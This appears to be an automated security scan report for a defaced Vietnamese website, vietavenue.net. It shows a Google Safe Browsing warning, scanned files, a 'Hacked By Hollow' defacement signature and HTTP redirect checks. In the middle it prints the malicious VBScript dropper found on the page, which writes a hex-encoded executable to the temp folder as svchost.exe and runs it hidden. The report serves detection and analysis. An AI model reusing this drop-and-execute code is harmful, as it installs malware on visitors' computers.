Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vietavenue.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vietavenue.net/ | 200 OK Content-Length: 229661 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000008800000009DAF5C5C824EA25F0055C7EB55610FA4A9327840AEBC01BDC2284CB0C4F05B10EEBFE04A2BF7B2B5B963873672393BE289A7D6A15B9C117D0F4BC102F4EE60C0000000000000000504500004C01030032C272320000000000000000E0000F010B010704003001000080000000A0030040D2040000B0030000E004000000400000100000000200000500000007000200040000000000000000600500 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
Deface/Content modification. The following signature was found: Hacked By Hollow <!-------------------------------------------- Hacked By Hollow ---------------------------------------------> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <link rel="icon" <img src="https://lh5.googleusercontent.com/-3uSAsuXmhkM/T6y3jzl9JdI/AAAAAAAAAgc/fYtW5laFAAE/s350/anak_indonesia.gif" alt="Smiley face" height="55" width="55" <br> <title>Hacked By Hollow</title> <style> .main{ma ...[231515 bytes skipped]... | ||
http://www.netdisaster.com/js/mynd.js | 200 OK Content-Length: 6897 Content-Type: application/x-javascript | clean |
http://vietavenue.net/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vietavenue.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 11 Oct 2014 22:52:37 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d79561822e23645f10b65b398d437ac3=29353e7caa35f348e83325be2f1f0760; path=/
X-Powered-By: PHP/5.3.25
GET / HTTP/1.1
Host: vietavenue.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 11 Oct 2014 22:52:37 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d79561822e23645f10b65b398d437ac3=29353e7caa35f348e83325be2f1f0760; path=/
X-Powered-By: PHP/5.3.25
Second query (visit from search engine):
GET / HTTP/1.1
Host: vietavenue.net
Referer: http://www.google.com/search?q=vietavenue.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vietavenue.net
Referer: http://www.google.com/search?q=vietavenue.net
Result:
The result is similar to the first query. There are no suspicious redirects found.